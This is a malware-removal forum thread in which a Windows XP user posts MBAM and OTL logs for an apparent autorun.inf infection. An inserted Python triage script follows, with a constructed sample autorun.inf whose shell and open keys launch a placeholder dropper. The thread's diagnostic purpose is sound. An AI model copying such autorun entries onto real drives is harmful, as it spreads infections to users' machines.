Geeks to Go

Double-click on drives not working (?)



#1 couber (Member, 29 posts)
Hi everybody!!!

This is the second post, after Philipcorcoran's reply that the problem might be an infection.

After a system crash this morning, I have trouble entering my drives by double-clicking them in the "My Computer" window. Windows recognizes the drives normally and they are accessible either using left-click -> explore or left-click open, but not by double-clicking (???). Plus a new "autorun" option, just like when you insert a USB flash drive (I'm not sure of the right word because I have the Greek version), appeared. I scanned for viruses with ESET Smart Security without findings. Currently I am scanning again with ESET and then I'll use Malwarebytes' Anti-Malware.

I have WinXP SP3 fully updated. Please help!!!

#2 RKinner (Malware Expert, MVP, 23,181 posts)
Post the logs from http://www.geekstogo...uide-t2852.html
so we can see what is going on.

If you are seeing an autorun.inf file (not a folder) on your C:\ and other drives, it is definitely an infection. You can usually look at the file with Notepad and see what it is up to.

Start, Run, notepad c:\autorun.inf , OK

Copy the text and paste it in your reply along with your logs. (Please do not attach your logs - just copy and paste them too.)

Ron
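The check Ron describes above, as an added example that is not code from the thread or from the OTL/MBAM tools: a Python triage helper that parses the launch-related keys of a root-level autorun.inf (the mechanism that turns a double-click on a drive into "run a program") and decodes the NoDriveTypeAutoRun mask that OTL reports in its O7 line, so a helper can see which drive types still honour AutoRun. The autorun.inf text and the program name in it are constructed placeholders.

```python
"""Triage helper for the autorun.inf symptom in this thread (added example, not
code from the thread, OTL or MBAM; the autorun.inf sample below is constructed).

It parses the launch-related keys of a root-level autorun.inf, which explains why
double-click on a drive stops opening it, and decodes the NoDriveTypeAutoRun
value OTL reports in its O7 line to show which drive types still honour AutoRun.
"""
import configparser
import re
from typing import Dict, List

# [autorun] keys that make Explorer run something. "open"/"shellexecute" fire on
# AutoRun; "shell\<verb>\command" overrides the drive's context-menu verbs, and
# "shell=<verb>" makes that verb the double-click default. Together they turn a
# double-click on C:\ into "run the listed program" instead of "open the drive".
LAUNCH_KEY_RE = re.compile(r"^(open|shellexecute|shell\\[^\\]+\\command)$", re.I)

# Bits of HKCU\...\CurrentVersion\policies\Explorer\NoDriveTypeAutoRun. A SET bit
# disables AutoRun for that drive type. 145 (0x91) in the OTL log is the XP default.
DRIVE_TYPE_BITS = {
    0x01: "unknown",
    0x02: "no root directory",
    0x04: "removable (USB/floppy)",
    0x08: "fixed (hard disk)",
    0x10: "network",
    0x20: "CD-ROM",
    0x40: "RAM disk",
    0x80: "reserved",
}
HARDENED_VALUE = 0xFF  # every bit set: AutoRun disabled for all drive types


def parse_autorun_inf(text: str) -> Dict[str, str]:
    """Return every key of the [autorun] section as {lower-cased key: value}."""
    cp = configparser.ConfigParser(
        interpolation=None,   # values like %SystemRoot% must not be expanded
        strict=False,         # real-world autorun.inf files repeat keys
        allow_no_value=True,  # and sometimes contain bare lines
        delimiters=("=",),
    )
    cp.optionxform = str      # keep the backslashes and case of the raw key
    cp.read_string(text)
    entries: Dict[str, str] = {}
    for section in cp.sections():
        if section.lower() != "autorun":
            continue
        for key, value in cp.items(section):
            entries[key.lower()] = (value or "").strip()
    return entries


def launch_commands(entries: Dict[str, str]) -> Dict[str, str]:
    """Only the keys that would execute something."""
    return {k: v for k, v in entries.items() if LAUNCH_KEY_RE.match(k) and v}


def autorun_enabled_drive_types(no_drive_type_autorun: int) -> List[str]:
    """Drive types on which AutoRun is still honoured under the given mask."""
    return [name for bit, name in DRIVE_TYPE_BITS.items()
            if not no_drive_type_autorun & bit]


def triage(autorun_text: str, no_drive_type_autorun: int) -> Dict[str, object]:
    """Combine both views into one verdict a helper can read at a glance."""
    entries = parse_autorun_inf(autorun_text)
    return {
        "launches": launch_commands(entries),
        "default_verb": entries.get("shell", ""),
        "autorun_enabled_for": autorun_enabled_drive_types(no_drive_type_autorun),
        "hardened": no_drive_type_autorun == HARDENED_VALUE,
    }


# Constructed sample in the shape such a file takes; the program name is a placeholder.
SAMPLE_AUTORUN_INF = r"""
[autorun]
open=placeholder_dropper.exe
shell\open\command=placeholder_dropper.exe
shell\explore\command=placeholder_dropper.exe
shell=open
icon=%SystemRoot%\system32\SHELL32.dll,4
"""

if __name__ == "__main__":
    result = triage(SAMPLE_AUTORUN_INF, 145)  # 145 is the O7 value from the OTL log
    for key, command in result["launches"].items():
        print(f"would run on '{key}': {command}")
    print("AutoRun still enabled for:", ", ".join(result["autorun_enabled_for"]))
    print("hardened (NoDriveTypeAutoRun = 0xFF):", result["hardened"])
```

With the log's value of 145, AutoRun is still honoured on fixed and removable drives; setting NoDriveTypeAutoRun to 0xFF (255) under both the HKLM and HKCU policies\Explorer keys disables it for every drive type, and the O6 line's HonorAutoRunSetting = 1 shows the Microsoft KB 967715 fix that makes Windows respect that mask is installed.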

#3 couber (Topic Starter, Member, 29 posts)
Hello,

Searching for the autorun.inf file was the first thing I did when double-clicking stopped working, and I didn't find anything. Perhaps it was cleaned by Smart Security. I don't know.

I followed the steps and now I post the results:

MBAM

Malwarebytes' Anti-Malware 1.11
Database version: 599

Scan type: Quick Scan
Objects scanned: 31378
Time elapsed: 2 minute(s), 21 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)

I couldn't complete the GMER scan due to the system freezing (I tried twice).

OTL Log files

OTL logfile created on: 8/2/2010 10:14:32 μμ - Run 1
OTL by OldTimer - Version 3.1.28.0 Folder = C:\Documents and Settings\Bougioukli Sofia\Επιφάνεια εργασίας
Windows XP Professional Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 8.0.6001.18702)
Locale: 00000408 | Country: Ελλάδα | Language: ELL | Date Format: d/M/yyyy

511,00 Mb Total Physical Memory | 206,00 Mb Available Physical Memory | 40,00% Memory free
1,00 Gb Paging File | 1,00 Gb Available in Paging File | 78,00% Paging File free
Paging file location(s): C:\pagefile.sys 768 1536 [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 24,40 Gb Total Space | 3,30 Gb Free Space | 13,53% Space Free | Partition Type: FAT32
Drive D: | 12,83 Gb Total Space | 3,31 Gb Free Space | 25,82% Space Free | Partition Type: FAT32
E: Drive not present or media not loaded
F: Drive not present or media not loaded
G: Drive not present or media not loaded
H: Drive not present or media not loaded
Drive I: | 232,83 Gb Total Space | 213,12 Gb Free Space | 91,53% Space Free | Partition Type: FAT32

Computer Name: HOME-VYXPNW9L30
Current User Name: Bougioukli Sofia
Logged in as Administrator.

Current Boot Mode: Normal
Scan Mode: Current user
Company Name Whitelist: On
Skip Microsoft Files: On
File Age = 14 Days
Output = Standard
Quick Scan

========== Processes (SafeList) ==========

PRC - [2010/02/08 21:50:36 | 000,549,376 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\Bougioukli Sofia\Επιφάνεια εργασίας\OTL.exe
PRC - [2010/01/07 15:10:36 | 000,908,248 | ---- | M] (Mozilla Corporation) -- C:\Program Files\Mozilla Firefox\firefox.exe
PRC - [2009/12/22 01:57:28 | 000,035,760 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files\Adobe\Reader 9.0\Reader\reader_sl.exe
PRC - [2009/11/10 15:39:26 | 000,079,160 | ---- | M] (Yahoo! Inc.) -- C:\Program Files\Yahoo!\Messenger\Ymsgr_tray.exe
PRC - [2009/10/11 04:17:36 | 000,153,376 | ---- | M] (Sun Microsystems, Inc.) -- C:\Program Files\Java\jre6\bin\jqs.exe
PRC - [2009/10/11 04:17:36 | 000,149,280 | ---- | M] (Sun Microsystems, Inc.) -- C:\Program Files\Java\jre6\bin\jusched.exe
PRC - [2009/03/27 10:03:00 | 000,163,908 | ---- | M] (NVIDIA Corporation) -- C:\WINDOWS\system32\nvsvc32.exe
PRC - [2008/11/09 22:48:14 | 000,602,392 | ---- | M] (Yahoo! Inc.) -- C:\Program Files\Yahoo!\SoftwareUpdate\YahooAUService.exe
PRC - [2008/04/14 18:30:36 | 001,038,336 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\explorer.exe
PRC - [2007/12/21 08:21:16 | 000,468,224 | ---- | M] (ESET) -- C:\Program Files\ESET\ESET Smart Security\ekrn.exe
PRC - [2007/12/21 08:21:06 | 001,443,072 | ---- | M] (ESET) -- C:\Program Files\ESET\ESET Smart Security\egui.exe
PRC - [2006/05/16 11:58:18 | 000,213,936 | ---- | M] (Macrovision Corporation) -- C:\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe
PRC - [2005/12/19 11:38:12 | 001,646,592 | ---- | M] (Webshots.com) -- C:\Program Files\Webshots\webshots.scr
PRC - [2005/12/10 17:57:20 | 000,133,016 | ---- | M] (DT Soft Ltd.) -- C:\Program Files\DAEMON Tools\daemon.exe
PRC - [2003/10/08 11:41:10 | 000,057,344 | ---- | M] (Realtek Semiconductor Corp.) -- C:\WINDOWS\SOUNDMAN.EXE
PRC - [2001/12/22 06:02:06 | 000,004,608 | ---- | M] (Conexant Systems) -- C:\WINDOWS\system32\carpserv.exe


========== Modules (SafeList) ==========

MOD - [2010/02/08 21:50:36 | 000,549,376 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\Bougioukli Sofia\Επιφάνεια εργασίας\OTL.exe


========== Win32 Services (SafeList) ==========

SRV - [2009/10/11 04:17:36 | 000,153,376 | ---- | M] (Sun Microsystems, Inc.) [Auto | Running] -- C:\Program Files\Java\jre6\bin\jqs.exe -- (JavaQuickStarterService)
SRV - [2009/03/27 10:03:00 | 000,163,908 | ---- | M] (NVIDIA Corporation) [Auto | Running] -- C:\WINDOWS\system32\nvsvc32.exe -- (NVSvc)
SRV - [2008/11/09 22:48:14 | 000,602,392 | ---- | M] (Yahoo! Inc.) [Auto | Running] -- C:\Program Files\Yahoo!\SoftwareUpdate\YahooAUService.exe -- (YahooAUService)
SRV - [2007/12/21 08:22:44 | 000,019,200 | ---- | M] (ESET) [On_Demand | Stopped] -- C:\Program Files\ESET\ESET Smart Security\EHttpSrv.exe -- (EhttpSrv)
SRV - [2007/12/21 08:21:16 | 000,468,224 | ---- | M] (ESET) [Auto | Running] -- C:\Program Files\ESET\ESET Smart Security\ekrn.exe -- (ekrn)
SRV - [2006/12/05 23:38:08 | 000,072,704 | ---- | M] (Adobe Systems) [On_Demand | Stopped] -- C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe -- (Adobe LM Service)


========== Standard Registry (SafeList) ==========


========== Internet Explorer ==========


IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.yahoo.com/
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

========== FireFox ==========

FF - prefs.js..browser.search.param.yahoo-fr: "chrf-ytbm"
FF - prefs.js..browser.search.param.yahoo-fr-cjkt: "chrf-ytbm"
FF - prefs.js..browser.search.param.yahoo-type: "${8}"
FF - prefs.js..browser.search.useDBForOrder: true
FF - prefs.js..browser.startup.homepage: "http://www.yahoo.com"
FF - prefs.js..extensions.enabledItems: {d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}:1.1.3
FF - prefs.js..extensions.enabledItems: {D4DD63FA-01E4-46a7-B6B1-EDAB7D6AD389}:0.9.6.5
FF - prefs.js..extensions.enabledItems: [email protected]:1.0
FF - prefs.js..extensions.enabledItems: {285da7e0-729d-11db-9fe1-0800200c9a66}:2.20091201


FF - HKLM\software\mozilla\Mozilla Firefox 3.5.7\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2008/04/19 15:54:36 | 000,000,000 | ---D | M]
FF - HKLM\software\mozilla\Mozilla Firefox 3.5.7\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins [2008/04/19 15:54:36 | 000,000,000 | ---D | M]

[2008/10/26 13:15:48 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Bougioukli Sofia\Application Data\Mozilla\Extensions
[2008/04/19 15:56:28 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Bougioukli Sofia\Application Data\Mozilla\Firefox\Profiles\fsnyug2o.default\extensions
[2009/12/15 00:24:06 | 000,000,000 | ---D | M] (Tinseltown) -- C:\Documents and Settings\Bougioukli Sofia\Application Data\Mozilla\Firefox\Profiles\fsnyug2o.default\extensions\{285da7e0-729d-11db-9fe1-0800200c9a66}
[2010/01/08 18:17:08 | 000,000,000 | ---D | M] (Adblock Plus) -- C:\Documents and Settings\Bougioukli Sofia\Application Data\Mozilla\Firefox\Profiles\fsnyug2o.default\extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}
[2010/01/09 12:56:14 | 000,000,000 | ---D | M] (Download Statusbar) -- C:\Documents and Settings\Bougioukli Sofia\Application Data\Mozilla\Firefox\Profiles\fsnyug2o.default\extensions\{D4DD63FA-01E4-46a7-B6B1-EDAB7D6AD389}
[2009/12/15 00:24:08 | 000,000,000 | ---D | M] (No name found) -- C:\Documents and Settings\Bougioukli Sofia\Application Data\Mozilla\Firefox\Profiles\fsnyug2o.default\extensions\{285da7e0-729d-11db-9fe1-0800200c9a66}\chrome\mozapps\extensions
[2009/12/15 00:24:08 | 000,000,000 | ---D | M] (No name found) -- C:\Documents and Settings\Bougioukli Sofia\Application Data\Mozilla\Firefox\Profiles\fsnyug2o.default\extensions\{285da7e0-729d-11db-9fe1-0800200c9a66}\chrome\mozapps\extensions\CVS
[2008/10/26 14:14:48 | 000,002,447 | ---- | M] () -- C:\Documents and Settings\Bougioukli Sofia\Application Data\Mozilla\Firefox\Profiles\fsnyug2o.default\searchplugins\bsplayer-search.xml
[2009/11/02 20:35:44 | 000,002,279 | ---- | M] () -- C:\Documents and Settings\Bougioukli Sofia\Application Data\Mozilla\Firefox\Profiles\fsnyug2o.default\searchplugins\ask.xml
[2009/11/02 20:35:44 | 000,000,573 | ---- | M] () -- C:\Documents and Settings\Bougioukli Sofia\Application Data\Mozilla\Firefox\Profiles\fsnyug2o.default\searchplugins\yahoo.xml
[2008/04/19 15:54:36 | 000,000,000 | ---D | M] -- C:\Program Files\Mozilla Firefox\extensions
[2009/09/19 09:03:34 | 000,001,525 | ---- | M] () -- C:\Program Files\Mozilla Firefox\searchplugins\amazon-en-GB.xml
[2009/09/19 09:03:34 | 000,000,760 | ---- | M] () -- C:\Program Files\Mozilla Firefox\searchplugins\eBay-en-GB.xml
[2009/09/19 09:03:34 | 000,001,219 | ---- | M] () -- C:\Program Files\Mozilla Firefox\searchplugins\wikipedia-el.xml

O1 HOSTS File: ([2002/09/30 12:00:00 | 000,000,944 | ---- | M]) - C:\WINDOWS\system32\drivers\etc\hosts
O1 - Hosts: 127.0.0.1 localhost
O2 - BHO: (&Yahoo! Toolbar Helper) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll (Yahoo! Inc.)
O2 - BHO: (Adobe PDF Link Helper) - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
O2 - BHO: (Java™ Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
O2 - BHO: (JQSIEStartDetectorImpl Class) - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll (Sun Microsystems, Inc.)
O2 - BHO: (SingleInstance Class) - {FDAD4DA1-61A2-4FD8-9C17-86F7AC245081} - C:\Program Files\Yahoo!\Companion\Installs\cpn\YTSingleInstance.dll (Yahoo! Inc)
O3 - HKLM\..\Toolbar: (Easy-WebPrint) - {327C2873-E90D-4c37-AA9D-10AC9BABA46C} - C:\Program Files\Canon\Easy-WebPrint\Toolband.dll ()
O3 - HKLM\..\Toolbar: (Systran40premi.IEPlugIn) - {CFB25594-4D5F-11D6-AB7B-00B0D094B576} - C:\Program Files\Systran\4_0\Premium\IEPlugIn.dll (SYSTRAN)
O3 - HKLM\..\Toolbar: (Yahoo! Toolbar) - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll (Yahoo! Inc.)
O3 - HKCU\..\Toolbar\WebBrowser: (no name) - {2C688203-7EB3-4327-9995-1CB417BA23F9} - No CLSID value found.
O4 - HKLM..\Run: [Adobe ARM] C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe (Adobe Systems Incorporated)
O4 - HKLM..\Run: [Adobe Reader Speed Launcher] C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe (Adobe Systems Incorporated)
O4 - HKLM..\Run: [CARPService] C:\WINDOWS\System32\carpserv.exe (Conexant Systems)
O4 - HKLM..\Run: [DAEMON Tools] C:\Program Files\DAEMON Tools\daemon.exe (DT Soft Ltd.)
O4 - HKLM..\Run: [Easy-PrintToolBox] C:\Program Files\Canon\Easy-PrintToolBox\BJPSMAIN.EXE (CANON INC.)
O4 - HKLM..\Run: [egui] C:\Program Files\ESET\ESET Smart Security\egui.exe (ESET)
O4 - HKLM..\Run: [ISUSPM] C:\Program Files\Common Files\InstallShield\UpdateService\isuspm.exe (Macrovision Corporation)
O4 - HKLM..\Run: [MP10_EnsureFileVer] C:\WINDOWS\inf\unregmp2.exe (Microsoft Corporation)
O4 - HKLM..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe (Ahead Software Gmbh)
O4 - HKLM..\Run: [NvCplDaemon] C:\WINDOWS\System32\NvCpl.DLL (NVIDIA Corporation)
O4 - HKLM..\Run: [NvMediaCenter] C:\WINDOWS\System32\NvMcTray.DLL (NVIDIA Corporation)
O4 - HKLM..\Run: [NWEReboot] File not found
O4 - HKLM..\Run: [nwiz] C:\WINDOWS\System32\nwiz.exe ()
O4 - HKLM..\Run: [QuickTime Task] C:\Program Files\QuickTime\QTTask.exe (Apple Inc.)
O4 - HKLM..\Run: [SoundMan] C:\WINDOWS\SOUNDMAN.EXE (Realtek Semiconductor Corp.)
O4 - HKLM..\Run: [SunJavaUpdateSched] C:\Program Files\Java\jre6\bin\jusched.exe (Sun Microsystems, Inc.)
O4 - HKCU..\Run: [Messenger (Yahoo!)] C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe (Yahoo! Inc.)
O4 - Startup: C:\Documents and Settings\All Users\Start Menu\Προγράμματα\Εκκίνηση\Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office\OSA9.EXE (Microsoft Corporation)
O4 - Startup: C:\Documents and Settings\Bougioukli Sofia\Start Menu\Προγράμματα\Εκκίνηση\Webshots.lnk = C:\Program Files\Webshots\Launcher.exe ()
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: HonorAutoRunSetting = 1
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O8 - Extra context menu item: Easy-WebPrint Add To Print List - C:\Program Files\Canon\Easy-WebPrint\Resource.dll ()
O8 - Extra context menu item: Easy-WebPrint High Speed Print - C:\Program Files\Canon\Easy-WebPrint\Resource.dll ()
O8 - Extra context menu item: Easy-WebPrint Preview - C:\Program Files\Canon\Easy-WebPrint\Resource.dll ()
O8 - Extra context menu item: Easy-WebPrint Print - C:\Program Files\Canon\Easy-WebPrint\Resource.dll ()
O8 - Extra context menu item: Ε&ξαγωγή στο Microsoft Excel - C:\Program Files\Microsoft Office\Office10\EXCEL.EXE (Microsoft Corporation)
O15 - HKLM\..Trusted Domains: 1 domain(s) and sub-domain(s) not assigned to a zone.
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} http://www.update.mi...b?1225023621124 (WUWebControl Class)
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_17)
O16 - DPF: {CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Reg Error: Key error.)
O16 - DPF: {CAFEEFAC-0016-0000-0017-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_17)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_17)
O16 - DPF: DirectAnimation Java Classes file://C:\WINDOWS\Java\classes\dajava.cab (Reg Error: Key error.)
O16 - DPF: Microsoft XML Parser for Java file://C:\WINDOWS\Java\classes\xmldso.cab (Reg Error: Key error.)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.1.254
O20 - HKLM Winlogon: Shell - (Explorer.exe) - C:\WINDOWS\explorer.exe (Microsoft Corporation)
O20 - Winlogon\Notify\Antiwpa: DllName - antiwpa.dll - C:\WINDOWS\System32\antiwpa.dll ()
O24 - Desktop Components:0 (Τρέχουσα αρχική σελίδα) - About:Home
O24 - Desktop WallPaper: C:\Documents and Settings\Bougioukli Sofia\Local Settings\Application Data\Microsoft\Wallpaper1.bmp
O24 - Desktop BackupWallPaper: C:\Documents and Settings\Bougioukli Sofia\Local Settings\Application Data\Microsoft\Wallpaper1.bmp
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2005/03/13 12:18:36 | 000,000,000 | ---- | M] () - C:\AUTOEXEC.BAT -- [ FAT32 ]
O32 - AutoRun File - [2010/02/08 16:55:36 | 000,000,118 | RHS- | M] () - C:\autorun.inf -- [ FAT32 ]
O32 - AutoRun File - [2010/02/08 16:55:36 | 000,000,118 | RHS- | M] () - D:\autorun.inf -- [ FAT32 ]
O32 - AutoRun File - [2010/02/08 16:55:38 | 000,000,118 | RHS- | M] () - I:\autorun.inf -- [ FAT32 ]
O32 - AutoRun File - [2010/02/07 18:22:28 | 000,000,000 | ---D | M] - I:\autorun -- [ FAT32 ]
O33 - MountPoints2\{0f6518b8-51b6-11de-8b70-000a4808cb2a}\Shell - "" = AutoRun
O33 - MountPoints2\{1067fcff-93b8-11d9-95b6-806d6172696f}\Shell - "" = AutoRun
O33 - MountPoints2\{1067fd00-93b8-11d9-95b6-806d6172696f}\Shell - "" = AutoRun
O33 - MountPoints2\{ba2f3b64-bd97-11de-8bde-000a4808cb2a}\Shell - "" = AutoRun
O33 - MountPoints2\{d91db6b2-a386-11dd-8a47-4d6564696130}\Shell - "" = AutoRun
O33 - MountPoints2\I\Shell - "" = AutoRun
O34 - HKLM BootExecute: (autocheck autochk *) - File not found
O35 - comfile [open] -- "%1" %*
O35 - exefile [open] -- "%1" %*

NetSvcs: 6to4 - File not found
NetSvcs: Ias - C:\WINDOWS\system32\ias [2005/03/13 12:06:40 | 000,000,000 | ---D | M]
NetSvcs: Iprip - File not found
NetSvcs: Irmon - File not found
NetSvcs: NWCWorkstation - File not found
NetSvcs: Nwsapagent - File not found
NetSvcs: WmdmPmSp - File not found

CREATERESTOREPOINT
Restore point Set: OTL Restore Point (16891891626803200)

========== Files/Folders - Created Within 14 Days ==========

[2010/02/08 21:50:17 | 000,549,376 | ---- | C] (OldTimer Tools) -- C:\Documents and Settings\Bougioukli Sofia\Επιφάνεια εργασίας\OTL.exe
[2010/02/07 16:12:23 | 000,038,224 | ---- | C] (Malwarebytes Corporation) -- C:\WINDOWS\System32\drivers\mbamswissarmy.sys
[2010/02/07 16:12:18 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Malwarebytes
[2010/02/07 16:12:17 | 000,019,160 | ---- | C] (Malwarebytes Corporation) -- C:\WINDOWS\System32\drivers\mbam.sys
[2010/02/07 16:12:15 | 000,000,000 | ---D | C] -- C:\Program Files\Malwarebytes' Anti-Malware
[2010/02/07 13:35:14 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Bougioukli Sofia\Τα έγγραφά μου\WDC
[2010/02/03 19:58:03 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Bougioukli Sofia\Τα έγγραφά μου\Downloads
[2010/01/26 21:58:19 | 000,000,000 | -HSD | C] -- C:\Config.Msi
[2008/10/05 19:24:30 | 000,000,000 | ---D | M] -- C:\Documents and Settings\LocalService\Local Settings\Application Data\ESET
[2005/03/13 12:21:10 | 000,000,000 | ---D | M] -- C:\Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft
[2005/03/13 12:21:10 | 000,000,000 | ---D | M] -- C:\Documents and Settings\LocalService\Local Settings\Application Data\Microsoft
[2005/03/13 12:10:10 | 000,000,000 | --SD | M] -- C:\Documents and Settings\NetworkService\Application Data\Microsoft
[2005/03/13 12:10:10 | 000,000,000 | --SD | M] -- C:\Documents and Settings\LocalService\Application Data\Microsoft

========== Files - Modified Within 14 Days ==========

[2010/02/08 22:11:44 | 000,199,985 | ---- | M] () -- C:\WINDOWS\System32\nvapps.xml
[2010/02/08 22:11:32 | 000,000,006 | -H-- | M] () -- C:\WINDOWS\tasks\SA.DAT
[2010/02/08 22:11:26 | 000,002,048 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2010/02/08 21:50:36 | 000,549,376 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\Bougioukli Sofia\Επιφάνεια εργασίας\OTL.exe
[2010/02/08 16:58:04 | 006,553,600 | ---- | M] () -- C:\Documents and Settings\Bougioukli Sofia\ntuser.dat
[2010/02/08 16:55:36 | 000,004,944 | RHS- | M] () -- C:\WINDOWS\countermeasure.sys.vbs
[2010/02/08 16:55:36 | 000,004,944 | RHS- | M] () -- C:\countermeasure.sys.vbs
[2010/02/08 16:55:36 | 000,000,118 | RHS- | M] () -- C:\autorun.inf
[2010/02/08 15:33:20 | 000,000,049 | ---- | M] () -- C:\WINDOWS\NeroDigital.ini
[2010/02/08 15:33:18 | 000,124,928 | ---- | M] () -- C:\Documents and Settings\Bougioukli Sofia\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2010/02/07 18:20:18 | 000,054,156 | -H-- | M] () -- C:\WINDOWS\QTFont.qfn
[2010/02/07 18:20:18 | 000,001,409 | ---- | M] () -- C:\WINDOWS\QTFont.for
[2010/02/07 18:18:02 | 000,002,278 | ---- | M] () -- C:\WINDOWS\System32\wpa.dbl
[2010/02/07 17:08:40 | 000,000,278 | -HS- | M] () -- C:\Documents and Settings\Bougioukli Sofia\ntuser.ini
[2010/02/07 16:12:32 | 000,000,600 | ---- | M] () -- C:\Documents and Settings\All Users\Επιφάνεια εργασίας\Malwarebytes' Anti-Malware.lnk
[2010/01/26 21:58:56 | 000,001,633 | ---- | M] () -- C:\Documents and Settings\All Users\Επιφάνεια εργασίας\Adobe Reader 9.lnk

========== Files Created - No Company Name ==========

[2010/02/07 18:20:17 | 000,054,156 | -H-- | C] () -- C:\WINDOWS\QTFont.qfn
[2010/02/07 18:20:17 | 000,001,409 | ---- | C] () -- C:\WINDOWS\QTFont.for
[2010/02/07 18:17:03 | 000,005,376 | ---- | C] () -- C:\WINDOWS\System32\antiwpa.dll
[2010/02/07 16:12:30 | 000,000,600 | ---- | C] () -- C:\Documents and Settings\All Users\Επιφάνεια εργασίας\Malwarebytes' Anti-Malware.lnk
[2010/01/26 21:58:55 | 000,001,633 | ---- | C] () -- C:\Documents and Settings\All Users\Επιφάνεια εργασίας\Adobe Reader 9.lnk
[2010/01/26 19:29:16 | 000,004,944 | RHS- | C] () -- C:\WINDOWS\countermeasure.sys.vbs
[2010/01/26 19:29:16 | 000,004,944 | RHS- | C] () -- C:\countermeasure.sys.vbs
[2010/01/26 19:29:16 | 000,000,118 | RHS- | C] () -- C:\autorun.inf
[2008/11/23 12:49:39 | 000,162,304 | ---- | C] () -- C:\Program Files\UNWISE.EXE
[2008/09/05 14:52:59 | 000,023,040 | R--- | C] () -- C:\WINDOWS\System32\drivers\GVCplDrv.sys
[2008/07/04 00:43:35 | 000,001,747 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\QTSBandwidthCache
[2008/07/04 00:33:47 | 000,000,046 | ---- | C] () -- C:\WINDOWS\adiras.ini
[2008/02/24 09:47:05 | 000,271,360 | ---- | C] () -- C:\WINDOWS\System32\drivers\atksgt.sys
[2008/02/24 09:47:04 | 000,018,048 | ---- | C] () -- C:\WINDOWS\System32\drivers\lirsgt.sys
[2007/11/01 23:59:04 | 000,010,752 | ---- | C] () -- C:\WINDOWS\System32\BASSMOD.dll
[2007/11/01 23:58:02 | 000,041,472 | ---- | C] () -- C:\WINDOWS\System32\indexudf.dll
[2006/11/02 20:38:50 | 000,000,139 | ---- | C] () -- C:\Documents and Settings\Bougioukli Sofia\Local Settings\Application Data\fusioncache.dat
[2006/10/09 14:36:33 | 000,223,128 | ---- | C] () -- C:\WINDOWS\System32\drivers\dtscsi.sys
[2006/10/09 14:34:56 | 000,642,560 | ---- | C] () -- C:\WINDOWS\System32\drivers\sptd.sys
[2006/10/09 14:34:56 | 000,096,384 | ---- | C] () -- C:\WINDOWS\System32\drivers\sptd7533.sys
[2006/10/02 23:50:37 | 000,000,812 | ---- | C] () -- C:\WINDOWS\disney.ini
[2006/06/17 16:18:53 | 000,000,112 | ---- | C] () -- C:\WINDOWS\ActiveSkin.INI
[2006/02/26 21:46:40 | 000,002,438 | ---- | C] () -- C:\WINDOWS\CDPlayer.ini
[2006/02/26 21:13:19 | 000,027,136 | ---- | C] () -- C:\WINDOWS\System32\QTUninst.dll
